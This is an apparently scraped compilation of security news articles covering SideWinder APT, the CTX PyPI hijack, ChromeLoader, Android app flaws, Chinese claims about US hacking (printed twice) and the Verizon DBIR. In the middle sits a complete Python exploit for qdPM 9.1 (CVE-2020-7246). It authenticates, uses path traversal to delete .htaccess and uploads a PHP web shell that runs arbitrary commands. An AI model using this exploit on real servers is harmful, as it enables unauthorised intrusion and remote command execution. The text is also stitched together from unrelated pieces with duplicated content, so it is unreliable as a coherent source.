An "aggressive" advanced persistent threat (APT) group known as SideWinder has been linked to over 1,000 new attacks since April 2020.
"Some of the main characteristics of this threat actor that make it stand out among the others, are the sheer number, high frequency and persistence of their attacks and the large collection of encrypted and obfuscated malicious components used in their

An "aggressive" advanced persistent threat (APT) group known as **SideWinder** has been linked to over 1,000 new attacks since April 2020.

"Some of the main characteristics of this threat actor that make it stand out among the others, are the sheer number, high frequency and persistence of their attacks and the large collection of encrypted and obfuscated malicious components used in their operations," cybersecurity firm Kaspersky said in a report that was presented at Black Hat Asia this month.

SideWinder, also called Rattlesnake or T-APT-04, is said to have been active since at least 2012 with a track record of targeting military, defense, aviation, IT companies, and legal firms in Central Asian countries such as Afghanistan, Bangladesh, Nepal, and Pakistan.

Kaspersky's APT trends report for Q1 2022 published late last month revealed that the threat actor is actively expanding the geography of its targets beyond its victim profile to other countries and regions, including Singapore.

SideWinder has also been observed capitalizing the ongoing Russo-Ukrainian war as a lure in its phishing campaigns to distribute malware and steal sensitive information.

The adversarial collective's infection chains are notable for incorporating malware-rigged documents that take advantage of a remote code vulnerability in the Equation Editor component of Microsoft Office (CVE-2017-11882) to deploy malicious payloads on compromised systems.

Furthermore, SideWinder's toolset employs several sophisticated obfuscation routines, encryption with unique keys for each malicious file, multi-layer malware, and splitting command-and-control (C2) infrastructure strings into different malware components.

The three-stage infection sequence commences with the rogue documents dropping a HTML Application (HTA) payload, which subsequently loads a .NET-based module to install a second-stage HTA component that's designed to deploy a .NET-based installer.

This installer, in the next phase, is both responsible for establishing persistence on the host and loading the final backdoor in memory. The implant, for its part, is capable of harvesting files of interest as well as system information, among others.

No fewer than 400 domains and subdomains have been put to use by the threat actor over the past two years. To add an additional layer of stealth, the URLs used for C2 domains are sliced into two parts, the first portion of which is included in the .NET installer and the latter half is encrypted inside the second stage HTA module.

"This threat actor has a relatively high level of sophistication using various infection vectors and advanced attack techniques," Noushin Shabab of Kaspersky said, urging that organizations use up-to-date versions of Microsoft Office to mitigate such attacks.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

SideWinder Hackers Launched Over a 1,000 Cyber Attacks Over the Past 2 Years

To minimize the impact of cyber incidents, organizations must be pragmatic and develop a strategy of resilience for dealing with break-ins, advanced malware, and data theft.

The frequency and severity of cyber threats are escalating and will continue to get stronger as cybercriminals pivot from one target to the next to maximize profit potential. Sooner or later, an attack will be successful. This presents a huge risk for businesses that lack sufficient cyber-resiliency preparation to stop the spread and recover quickly.

Cybercriminals are becoming experts in deception, which makes them increasingly difficult to detect. When they infiltrate an organization’s system, the door remains open for them to recode and encrypt a business's data. Once this happens, cybercriminals gain control (of data and systems) and can hold a business's information for ransom.

In addition to the ransom cost, additional costs are incurred following a ransom attack. Of those companies falling victim, 74% report business disruption lasting more than a day, with 28% taking a week or longer to recover from a ransom attack. For many, especially small and midsize companies, the financial and reputational repercussions of recovering from the occurrence can be devastating.

**Cyber-Resilience Framework**

To minimize the impact of cyber incidents, organizations must become pragmatic and develop a cyber-resilience strategy for dealing with the ramifications of cyber incidents. While reducing cyber-risk doesn’t guarantee there will never be a creaky backdoor for cybercriminals to slip in, it decreases the opportunities for attack and can accelerate an organization's recovery rate.

A cyber-resilience framework must include numerous elements of prevention and the ability to recover (if an attack is successful). There are six steps organizations can leverage when creating a multipronged cyber framework to achieve cyber resiliency.

**1\. Identify**

Organizations cannot protect what they have not identified. IT teams must regularly scan the organization's entire IT footprint including endpoints, servers, and cloud applications. This ensures assets as well as potential vulnerabilities are identified before cybercriminals can exploit them.

**2\. Protect**

With the hybrid work model here to stay, employees' remote devices are often the first target for cybercriminals. To mitigate this risk, organizations must ensure employee devices have endpoint protection solutions enabled to ensure cyber intrusions are automatically blocked while still allowing their work routines to be left undisturbed.

**3\. Detect**

While prevention is key to reducing cyber-risks, one thing can be said about cybercriminals: They are persistent. If they meet a closed door, they will try another. Threat intelligence and experience-based detection are essential to prevent a cyberattack attempt from evolving into a major cybersecurity breach.

**4\. Respond**

If a threat is detected in the third step, organizations can find themselves in a harmful spot when considering business continuity. To lessen the impact of a cyber breach, organizations should have a predefined playbook in times of crisis. This step can reduce the period of panic and allow for IT teams and the entire organization to act timely and efficiently when a breach is detected.

**5\. Recover**

In many cases, a cybercriminal will create their own backdoor as they infiltrate an organization's system. This allows cybercriminals to return and continue to collect the information needed to hold a business for ransom. To enable an easy return, organizations need to back up critical servers and endpoints. This allows organizations to recover damaged devices and use their backup file recovery as a lifeline.

**6\. Educate**

This step comes back to cyber protection being only as strong as each remote employee. Cyber awareness is essential when establishing cyber resilience so IT teams need to take the time to educate employees about cybercrime tactics such as phishing and business email compromise. By consistently implementing periodic, easy-to-understand awareness and response training, organizations are one step closer to ensuring cyber resilience and mitigating human risk.

**From Framework to Action**

Unless implemented, a framework is just a blueprint. Organizations must convert a cyber-resilience plan into their cybersecurity infrastructure to ensure effectiveness. Furthermore, leveraging a cyber-resilience framework can act as a confidence assessment guide. Business leaders and IT teams alike must revaluate their action plans to achieve practical cyber-prevention methods for the next time cybercriminals knock at the backdoor.

6 Steps to Ensure Cyber Resilience

Four high severity vulnerabilities have been disclosed in a framework used by pre-installed Android System apps with millions of downloads.
The issues, now fixed by its Israeli developer MCE Systems, could have potentially allowed threat actors to stage remote and local attacks or be abused as vectors to obtain sensitive information by taking advantage of their extensive system privileges.
"As

Four high severity vulnerabilities have been disclosed in a framework used by pre-installed Android System apps with millions of downloads.

The issues, now fixed by its Israeli developer MCE Systems, could have potentially allowed threat actors to stage remote and local attacks or be abused as vectors to obtain sensitive information by taking advantage of their extensive system privileges.

"As it is with many of pre-installed or default applications that most Android devices come with these days, some of the affected apps cannot be fully uninstalled or disabled without gaining root access to the device," the Microsoft 365 Defender Research Team said in a report published Friday.

The weaknesses, which range from command-injection to local privilege escalation, have been assigned the identifiers CVE-2021-42598, CVE-2021-42599, CVE-2021-42600, and CVE-2021-42601, with CVSS scores between 7.0 and 8.9.

Command injection proof-of-concept (POC) exploit code

Injecting a similar JavaScript code to the WebView

The vulnerabilities were discovered and reported in September 2021 and there is no evidence that the shortcomings are being exploited in the wild.

Microsoft didn't disclose the complete list of apps that use the vulnerable framework in question, which is designed to offer self-diagnostic mechanisms to identify and fix issues impacting an Android device.

This also meant that the framework had broad access permissions, including that of audio, camera, power, location, sensor data, and storage, to carry out its functions. Coupled with the issues identified in the service, Microsoft said it could permit an attacker to implant persistent backdoors and take over control.

Some of the affected apps are from large international mobile service providers such as Telus, AT&T, Rogers, Freedom Mobile, and Bell Canada -

*   Mobile Klinik Device Checkup (com.telus.checkup)
*   Device Help (com.att.dh)
*   MyRogers (com.fivemobile.myaccount)
*   Freedom Device Care (com.freedom.mlp.uat), and
*   Device Content Transfer (com.ca.bell.contenttransfer)

Additionally, Microsoft is recommending users to look out for the app package "com.mce.mceiotraceagent" — an app that may have been installed by mobile phone repair shops — and remove it from the phones, if found.

The susceptible apps, although pre-installed by the phone providers, are also available on the Google Play Store and are said to have passed the app storefront's automatic safety checks without raising any red flags because the process was not engineered to look out for these issues, something that has since been rectified.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Finds Critical Bugs in Pre-Installed Apps on Millions of Android Devices

They claim that all data received was deleted

They claim that all data received was deleted

A ‘security researcher’ accused of unethical activity through the alleged hijack of a popular open source project insists that their actions were not malicious.

Last week, as previously reported by _The Daily Swig_, social media users alerted the Python Package Index (PyPI) repository to a potentially malicious or hijacked package, CTX.

**BACKGROUND** Malicious Python library CTX removed from PyPI repo

On May 22, Reddit user SocketPuppets promoted the package online, claiming it had received an update after lying dormant for roughly eight years.

The CTX Python library was available on both GitHub and PyPI. However, it wasn’t long before participants on a Reddit thread highlighted that the GitHub package had not been updated at the same time as the PyPI repository.

To make matters worse, the individual responsible also allegedly compromised a different package, phpass.

Indian hacker Somdev Sangwan said: “Python’s CTX library and a fork of PHP’s phpass have been compromised.’

**Domain takeover**

With an estimated three million downloads combined, the Python packages had been tampered with to send environmental variables – such as AWS keys – to an external URL leading to a Heroku app.

Once alerted to the anomaly, PyPI removed the CTX package, explaining that the exfiltration method had been added after a perpetrator purchased a domain name for the expired email address used by the original developer, sent themselves a recovery password, and took over the account.

Read more of the latest hacking news from around the world

Users who installed the package between May 14 and May 22, 2022, may have had linked environmental variables and credentials compromised.

SocketPuppets (account since deleted) tried to defend their actions, claiming the unusual activity was due to a “new company account”.

The individual accused of the activity, then published a Medium blog post to share their “side of the story”.

“All this research DOES NOT contain any malicious activity,” Aydin said. “I want to show how this simple attack affects +10M users and companies. ALL THE DATA THAT I RECEIVED IS DELETED AND NOT USED.”

**‘Never responsibly disclosed’**

According to Aydin, a ‘scraper tool’ and a bot were used to take over the packages. It cost $5 to register the expired domain.

Aydin added that he sent a report to the bug bounty platform HackerOne on May 15 that was closed as a duplicate a day later.

Their HackerOne profile does not appear to show an associated bug report.

Speaking to _The Daily Swig_, Sangwan said that the vulnerability “was never responsibly disclosed”, and “this was an actual attack”.

Sangwan added: “After taking over the package, the attacker posted about it on Reddit… and when other users started getting suspicious and I discovered another package they had compromised. The attacker came out and claimed that he did it for ‘research’.

“Replacing a popular software with a backdoored version that steals password\[s\] of people is anything but research.”

**YOU MIGHT ALSO LIKE** Volatile market for stolen credit card data shaken up by sanctions against Russia

Security ‘researcher’ hits back against claims of malicious CTX file uploads

By Waqas
A new malvertising campaign has emerged in which ChromeLoader malware is being used to hijack browsers and steal…
This is a post from HackRead.com Read the original post: ChromeLoader Browser Malware Spreading Via Pirated Games and QR Codes

**A new malvertising campaign has emerged in which ChromeLoader malware is being used to hijack browsers and steal data.**

A sudden, unexpected spike in browser hijacking campaigns utilizing ChromeLoader malware has been detected lately, stated Aedan Russell from Red Canary. Russell noted that the attackers aim to hijack browsers through the “pervasive and persistent” ChromeLoader malware that can modify browser settings and redirect the victim to advertisement sites.

The malvertising campaign is financially motivated as the attackers are part of a wider network of marketing affiliates and redirect the user to advertising sites.

**What is ChromeLoader?**

For your information, ChromeLoader is a Chrome browser extension distributed as ISO files through pay-per-install websites and fraudulent social media posts usually offering QR codes, pirated movies, or cracked video games.

A screenshot of a Tweet shared by researchers shows a redacted scannable malicious QR code that leads to ChromeLoader’s download site

ChromeLoader changes web browser settings to display search results that lure users to download unwanted software, visit dating sites or adult games platforms, and participate in fake surveys. It stands apart among other browser hijackers for its incredible persistence, infection route, and volume involving abuse of PowerShell.

**Attack Scenario**

According to Red Canary’s blog post, the malware operators use a malicious ISO archive file to invade the system. This file is promoted as a cracked executable for commercial software or a video game so that the victims can download it from malicious sites or torrents. Malware operators also use Twitter posts to promote the malicious executable.

When the file is double-clicked by a user in Windows 10 or later systems, it is mounted as a virtual CD-ROM drive. Although it appears to be a keygen or game crack titled CS\_Installer.exe, the executable in this ISO file actually unleashes the malware.

ChromeLoader then executes/decodes a PowerShell command to fetch an archive from the remote resource and gets loaded on the system as a Chrome extension. Afterward, the PowerShell removes the scheduled task and infects Chrome with a discreetly injected extension to hijack and manipulate the browser results.

Red Canary researchers identified that ChromeLoader operators also target macOS systems to manipulate Safari web browser and Chrome. The infection chain is similar on macOS, but attackers use DMG (Apple Disk Image) file instead of ISO.

Furthermore, instead of the executable containing the installer, in macOS, an installer bash script is used to download and decompress the malware extension onto the private/var/tmp directory.

**More Chrome Browser and Malware News**

1.  New Jupyter backdoor malware steals Chrome, Firefox data
2.  New variant of MassLogger Trojan stealing Chrome, Outlook data
3.  Chrome extensions with 80 million+ users found engaging in ad fraud
4.  Malicious Chrome, Edge extensions manipulating Google search results
5.  Malware infected browser extensions stealing Chrome, and Edge user data

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

ChromeLoader Browser Malware Spreading Via Pirated Games and QR Codes

qdPM version 9.1 authenticated remote code execution exploit that leverages a path traversal.

    # Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net# Date: 2021-08-03# Original Exploit Author: Rishal Dwivedi (Loginsoft)# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)# Exploit Author: Leon Trappett (thepcn3rd)# Vendor Homepage: http://qdpm.net/# Software Link: http://qdpm.net/download-qdpm-free-project-management# Version: <=1.9.1# Tested on: Ubuntu Server 20.04 (Python 3.9.2)# CVE : CVE-2020-7246# Exploit written in Python 3.9.2# Tested Environment - Ubuntu Server 20.04 LTS# Path Traversal + Remote Code Execution# Exploit modification: RedHatAugust#!/usr/bin/python3import sysimport requestsfrom lxml import htmlfrom argparse import ArgumentParsersession_requests = requests.session()def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):    request_1 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, uservar),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[remove_photo]': (None, '1'),        }    return request_1def req(userid, username, csrftoken_, EMAIL, HOSTNAME):    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)    request_3 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, ''),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),        }    upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)def main(HOSTNAME, EMAIL, PASSWORD):    url = HOSTNAME + '/index.php/login'    result = session_requests.get(url)    #print(result.text)    login_tree = html.fromstring(result.text)    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}    result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))    # The designated admin account does not have a myAccount page    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')    account_tree = html.fromstring(account_page.content)    userid = account_tree.xpath("//input[@name='users[id]']/@value")    username = account_tree.xpath("//input[@name='users[name]']/@value")    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")    req(userid, username, csrftoken_, EMAIL, HOSTNAME)    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')    final_tree = html.fromstring(get_file.content)    backdoor = requests.get(HOSTNAME + "uploads/users/")    count = 0    dateStamp = "1970-01-01 00:00"    backdoorFile = ""    for line in backdoor.text.split("\n"):        count = count + 1        if "backdoor.php" in str(line):            try:                start = "\"right\""                end = " </td"                line = str(line)                dateStampNew = line[line.index(start)+8:line.index(end)]                if (dateStampNew > dateStamp):                    dateStamp = dateStampNew                    print("The DateStamp is " + dateStamp)                    backdoorFile = line[line.index("href")+6:line.index("php")+3]            except:                print("Exception occurred")                continue        #print(backdoor)    print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami')if __name__ == '__main__':    print("You are not able to use the designated admin account because they do not have a myAccount page.\n")    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')    parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')    parser.add_argument('-p', '--password', dest='password', help='User password')    args = parser.parse_args()    # Added detection if the arguments are passed and populated, if not display the arguments    if  (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):            main(args.hostname, args.email, args.password)    else:        parser.print_help()

qdPM 9.1 Remote Code Execution

The Chinese government recently began saber-rattling about American cyberespionage. The catch? It’s all old news.

For the best part of a decade, US officials and cybersecurity companies have been naming and shaming hackers they believe work for the Chinese government. These hackers have stolen terabytes of data from companies like pharmaceutical and video game firms, compromised servers, stripped security protections, and highjacked hacking tools, according to security experts. And as China’s alleged hacking has grown more brazen, individual Chinese hackers face indictments. However, things may be changing.

Since the start of 2022, China’s Foreign Ministry and the country’s cybersecurity firms have increasingly been calling out alleged US cyberespionage. Until now, these allegations have been a rarity. But the disclosures come with a catch: They appear to rely on years-old technical details, which are already publicly known and don’t contain fresh information. The move may be a strategic change for China as the nation tussles to cement its position as a tech superpower.

“These are useful materials for China’s tit-for-tat propaganda campaigns when they faced US accusation and indictment of China’s cyberespionage activities,” says Che Chang, a cyber threat analyst at the Taiwan-based cybersecurity firm TeamT5.

China’s accusations, which were noted by security journalist Catalin Cimpanu, all follow a very similar pattern. On February 23, Chinese security company Pangu Lab published allegations that the US National Security Agency’s elite Equation Group hackers used a backdoor, dubbed Bvp47, to monitor 45 countries. The _Global Times_, a tabloid newspaper that’s part of China’s state-controlled media, ran an exclusive report on the research. Weeks later, on March 14, the newspaper had a second exclusive story about another NSA tool, NOPEN, based on details from China’s National Computer Virus Emergency Response Center. A week later, Chinese cybersecurity firm Qihoo 360 alleged that US hackers had been attacking Chinese companies and organizations. And on April 19, the _Global Times_ reported on further National Computer Virus Emergency Response Center findings about HIVE, malware developed by the CIA.

The reports are accompanied with a flurry of statements—often in response to questions from the media—by China’s Foreign Ministry spokespeople. “China is gravely concerned over the irresponsible malicious cyber activities of the US government,” Foreign Ministry spokesperson Wang Wenbin said in April after one of the announcements. “We urge the US side to explain itself and immediately stop such malicious activities.” Over the first nine days of May, Foreign Ministry spokespeople commented on US cyber activities at least three times. “One cannot whitewash himself by smearing others,” Zhao Lijian said in one instance.

While cyber activity undertaken by state actors is often wrapped in highly classified files, many hacking tools developed by the US are no longer secret. In 2017, WikiLeaks published 9,000 documents in the Vault7 leaks, which detailed many of the CIA’s tools. A year earlier, the mysterious Shadow Brokers hacking group stole data from one of the NSA’s elite hacking teams and slowly dripped the data to the world. The Shadow Brokers leaks included dozens of exploits and new zero-days—including the Eternal Blue hacking tool, which has since been used repeatedly in some of the largest cyberattacks. Many of the details in the Shadow Brokers leaks match up with details about NSA which were disclosed by Edward Snowden in 2013. (An NSA spokesperson said it has “no comment” for this story; the agency routinely does not comment on its activities.)

Ben Read, director of cyberespionage analysis at the US cybersecurity firm Mandiant, says China’s state media push of alleged US hacking seems to be consistent, but it mostly contains older information. “Everything that I've seen they've written about, they tie back to the US through either the Snowden leaks or Shadow Brokers,” Read says.

Pangu Lab’s February report on Bvp47—the only publication on its website—says it initially discovered the details in 2013 but pieced them together after the Shadow Brokers leaks in 2017. “The report was based on a decade-old malware, and the decryption key is the same” as in WikiLeaks, Che says. The details of HIVE and NOPEN have also been available for years. Neither Pangu Labs or Qihoo 360, which has been on the US government sanctions list since 2020, responded to requests for comment on their research or methodology. A Pangu spokesperson previously said it recently published the old details, and it had taken a long time to analyze the data.

Megha Pardhi, a China researcher at Takshashila Institution, an Indian think tank, says the publications and follow-up comments from officials can serve multiple purposes. Internally, China can use it for propaganda and to send a message to the US that it has the capability to attribute cyber activity. But beyond this, there is a warning to other countries, Pardhi says. “The message is that even though you're allied with the United States, they're still gonna come after you.”

“We oppose and crack down in accordance with law all forms of cyberespionage and attacks,” Liu Pengyu, a spokesperson for the Chinese Embassy in the US, says in a statement. Liu did not respond directly to questions around the apparent uptick in finger-pointing at the US this year, the evidence that was being used to do so, or why this may be happening years after details originally emerged. China is widely considered to be one of the most sophisticated and active state cyber actors—involved in spying, hacking for espionage, and gathering data. Western officials consider the country to be the biggest cyber threat, ahead of Russia, Iran, and North Korea.

“Recently, there have been many reports of US carrying cybertheft and attacks on China and the whole world,” Liu says in a statement that reflects comments made by China’s Foreign Ministry spokespeople this year. “The US should reflect on itself and join others to jointly safeguard peace and security in cyberspace with a responsible attitude.”

Many of the disclosures in 2022—there are only a handful of previous Chinese accusations against the US—stem from private cybersecurity companies. This is similar to how Western cybersecurity companies report their findings; they are not always incorporated into government talking points, however, and state-backed media is all but nonexistent.

The potential shift in tactics could play into wider policies around technology use and development. In recent years, China’s policies have focused on positioning itself as a dominant force in technology standards in everything from 5G to quantum computers. A raft of new cybersecurity and privacy laws have detailed how companies should handle data and protect national information—including the potential for hoarding previously unknown vulnerabilities.

“One explanation is, possibly, that we are engaged in a kind of ideological—or if you want to put it more prosaically, a marketing—battle with China,” says Suzanne Spaulding, a senior adviser at the Center for Strategic and International Studies and previously a senior cybersecurity official in the Obama administration. The US-China relationship has been fraught in recent years, with tensions rising over national security issues, including concerns about the telecom giant Huawei. “China is offering, around the world, a competing model to Western-style democracy,” Spaulding says, noting that China may be responding to Western countries coming together on multiple issues since Russia invaded Ukraine.

In July 2021, China’s Ministry of Industry and Information Technology published plans to boost the private security industry by 2023. Companies based in China should spend more on their defenses against cyberattacks, the government department said at the time. It also said the whole cybersecurity industry within China should look to grow in size in the coming years, as well as bolster the development of network monitoring systems and threat detection techniques. “What we've started to see over the last couple of years, increasingly, is that companies in China are building their own capabilities,” says Adam Meyers, head of intelligence at the US cybersecurity firm CrowdStrike. “There's been a few that have waded into the threat intelligence space.”

But publicizing details of the long-known incidents still raises plenty of questions. Mandiant’s Read says he wonders exactly how many cyberespionage cases Chinese companies and authorities are finding. The answer would provide significant clues about their true capabilities. Read says: “Is this 50 percent of what they're finding? Is this 1 percent of what they're finding? Is this 90 percent of what they're finding?”

The move appears to be strategic, says TeamT5’s Che. “Considering the close relationship between China's cybersecurity firms and the Chinese government, our team surmises that these reports could be a part of China’s strategic distraction when they are accused of massive surveillance systems and espionage operations.”

The Mystery of China’s Sudden Warnings About US Hackers

For the best part of a decade, US officials and cybersecurity companies have been naming and shaming hackers they believe work for the Chinese government. These hackers have stolen terabytes of data from pharmaceutical companies to video game firms, compromised servers, stripped security protections, and highjacked hacking tools, according to security experts. And as China’s alleged hacking has grown in aggression, individual Chinese hackers face indictments. However, things may be changing.

Since the start of 2022, there has been a marked uptick in China’s Foreign Ministry and the country’s cybersecurity firms calling out alleged US cyberespionage. Until now, these allegations have been a rarity. But the disclosures come with a catch: They appear to rely on years-old technical details, which are already publicly known and don’t contain fresh information. The move may be a strategic change for China as the nation tussles to cement its position as a tech superpower.

“These are useful materials for China’s tit-for-tat propaganda campaigns when they faced US accusation and indictment of China’s cyberespionage activities,” says Che Chang, a cyber threat analyst at Taiwan-based cybersecurity firm TeamT5.

China’s accusations, which were noted by security journalist Catalin Cimpanu, all follow a very similar pattern. On February 23, Chinese security company Pangu Lab published allegations that the US National Security Agency’s elite Equation Group hackers used a backdoor, dubbed Bvp47, to monitor 45 countries. The _Global Times_, a tabloid newspaper that’s part of China’s state-controlled media, ran an exclusive report on the research. Weeks later, on March 14, the newspaper had a second exclusive story about another NSA tool, NOPEN, based on details from China’s National Computer Virus Emergency Response Center. A week later, Chinese cybersecurity firm Qihoo 360 alleged that US hackers had been attacking Chinese companies and organizations. And on April 19, the Global Times reported on further National Computer Virus Emergency Response Center findings around HIVE, malware developed by the CIA.

The reports are accompanied with a flurry of statements—often in response to questions from the media—by China’s Foreign Ministry spokespeople. “China is gravely concerned over the irresponsible malicious cyber activities of the US government,” Foreign Ministry spokesperson Wang Wenbin said in April after one of the announcements. “We urge the US side to explain itself and immediately stop such malicious activities.” Over the first nine days of May, Foreign Ministry spokespeople commented on US cyber activities at least three times. “One cannot whitewash himself by smearing others,” Zhao Lijian said in one instance.

While cyber activity undertaken by state actors is often wrapped in highly classified files, many hacking tools developed by the US are no longer a secret. In 2017, WikiLeaks published 9,000 documents in the Vault7 leaks, which detailed many of the CIA’s tools. A year earlier, the mysterious Shadow Brokers hacking group stole data from one of the NSA’s elite hacking teams and slowly dripped the data to the world. The Shadow Brokers leaks included dozens of exploits and new zero-days—including the Eternal Blue hacking tool, which has since been used repeatedly in some of the largest cyberattacks. Many of the details in the Shadow Brokers leaks match up with details about NSA which were disclosed by Edward Snowden in 2013. (An NSA spokesperson said it has “no comment” for this story; the agency routinely does not comment on its activity.)

Ben Read, director of cyberespionage analysis at US cybersecurity firm Mandiant, says China’s state media push of alleged US hacking seems to be consistent, but it mostly contains older information. “Everything that I've seen they've written about, they tie back to the US through either the Snowden leaks or Shadow Brokers,” Read says.

Pangu Lab’s February report on Bvp47—the only publication on its website—says it initially discovered the details in 2013 but pieced them together after the Shadow Brokers leaks in 2017. “The report was based on a decade-old malware, and the decryption key is the same” as in WikiLeaks, Che says. The details of HIVE and NOPEN have also been available for years. Neither Pangu Labs or Qihoo 360, which has been on the US government sanctions list since 2020, responded to requests for comment on their research or methodology. Although a Pangu spokesperson previously said it recently published the old details, and it had taken a long time to analyze the data.

Megha Pardhi, a China researcher at Takshashila Institution, an Indian think tank, says the publications and follow-up comments from officials can serve multiple purposes. Internally, China can use it for propaganda and to send a message to the US that it has the capability to attribute cyber activity. But beyond this, there is a warning to other countries, Pardhi says. “The message is that even though you're allied with the United States, they're still gonna come after you.”

“We oppose and crack down in accordance with law all forms of cyberespionage and attacks,” Liu Pengyu, a spokesperson for the Chinese Embassy in the US, says in a statement. Liu did not respond directly to questions around the apparent uptick in finger-pointing at the US this year, the evidence that was being used to do so, or why this may be happening years after details originally emerged. China is widely considered to be one of the most sophisticated and active state cyber actors—involved in spying, hacking for espionage, and gathering data. Western officials consider the country to be the biggest cyber threat, ahead of Russia, Iran, and North Korea.

“Recently, there have been many reports of US carrying cyber theft and attacks on China and the whole world,” Liu says in a statement that reflects comments made by China’s Foreign Ministry spokespeople this year. “The US should reflect on itself and join others to jointly safeguard peace and security in cyberspace with a responsible attitude.”

Many of the disclosures in 2022—there are only a handful of previous Chinese accusations against the US—stem from private cybersecurity companies. This is similar to how Western cybersecurity companies report their findings; they are not always incorporated into government talking points, however, and state-backed media is all but nonexistent.

The potential shift in tactics could play into wider policies around technology use and development. In recent years, China’s policies have focused on positioning itself as a dominant force in technology standards in everything from 5G to quantum computers. A raft of new cybersecurity and privacy laws have detailed how companies should handle data and protect national information—including the potential for hoarding previously unknown vulnerabilities.

“One explanation is, possibly, that we are engaged in a kind of ideological—or if you want to put it more prosaically, a marketing—battle with China,” says Suzanne Spaulding, a senior adviser at the Center for Strategic and International Studies and previously a senior cybersecurity official in the Obama administration. The US-China relationship has been fraught in recent years, with tensions rising over national security issues including concerns of telecom giant Huawei. “China is offering, around the world, a competing model to Western-style democracy,” Spaulding says, noting that China may be responding to Western countries coming together on multiple issues since Russia invaded Ukraine.

In July 2021, China’s Ministry of Industry and Information Technology published plans to boost the private security industry by 2023. Companies based in China should spend more on their defenses against cyberattacks, the government department said at the time. It also said the whole cybersecurity industry within China should look to grow in size in the coming years, as well as bolster the development of network monitoring systems and threat detection techniques. “What we've started to see over the last couple of years, increasingly, is that companies in China are building their own capabilities,” says Adam Meyers, vice president of intelligence at US cybersecurity firm CrowdStrike. “There's been a few that have waded into the threat intelligence space.”

But publicizing details of the long-known incidents still raises plenty of questions. Mandiant’s Read says he wonders exactly how many cyberespionage cases Chinese companies and authorities are finding. The answer would provide significant clues about their true capabilities. Read says: “Is this 50 percent of what they're finding? Is this 1 percent of what they're finding? Is this 90 percent of what they're finding?”

The move appears to be strategic, says TeamT5’s Che. “Considering the close relationship between China's cybersecurity firms and the Chinese government, our team surmises that these reports could be a part of China’s strategic distraction when they are accused of massive surveillance systems and espionage operations.”

Supply chain and ransomware attacks increased dramatically in 2021, which explains why so many data breaches in Verizon's "2022 Data Breach Investigations Report" were grouped as system intrusion.

Breaches due to system intrusion have ratcheted up dramatically since 2019, according to Verizon’s "2022 Data Breach Investigations Report." While system intrusion, which includes hacking, malware, and ransomware, was the most common type of data breach in 2021, it didn’t even make the top three in 2019.

The researchers analyzed 23,896 security incidents, of which 5,212 were confirmed data breaches. Similar incidents are grouped together into “patterns.”

To clarify, DBIR looks at eight patterns:

*   **Basic Web application attacks:** Attacks against Web applications where the attacker is after the data.
*   **Denial-of-service attacks:** Network and application-layer attacks compromising the availability of networks and systems.
*   **Lost and stolen assets:** Assets that went missing, either maliciously or by mistake.
*   **Miscellaneous errors:** Unintentional actions compromised an asset’s security.
*   **Privilege misuse:** Involves unapproved or malicious use of legitimate privileges.
*   **Social engineering:** Tricking an individual into compromising the security of a device or data.
*   **System intrusion:** Attacks depending on malware (including ransomware) or hacking to compromise systems.
*   **“Everything else.”**

The second and third most common types of data breach in 2021 were basic Web application attacks and social engineering. In 2020, social engineering was the most common, followed by Web application attacks and then system intrusion. The top three in 2019 were Web application attacks, social engineering, and miscellaneous errors. System intrusions were the fourth most common pattern observed in Verizon’s dataset, the researchers said.

    

**Where the Threats Are**

System intrusions tend to be one of the more complex breaches because they consist of multiple different actions, such as social engineering, malware, and hacking. One reason for the spike for system intrusion may be the fact that supply chain and ransomware attacks increased dramatically this year, the researchers say. The most common actions -- how attackers are carrying out their activities -- for data breaches (grouped under system intrusions) included use of command-and-control servers to execute commands, stolen credentials, malware deploying backdoors, and ransomware. The five most common attack vectors were third-party software, software updates (SolarWinds, anyone?), desktop sharing software, email, and Web applications. 

In contrast, Web application attacks in Verizon's dataset consist of two groups of actions: ways to access the server and the payload itself. Ways to access the server include actions such as stealing credentials, exploiting vulnerabilities, and brute-forcing passwords. While the majority of the attacks focus on the Web application, breaches in this group, attackers also relied on backdoors, remote injection, and accessing desktop sharing software to compromise the server. 

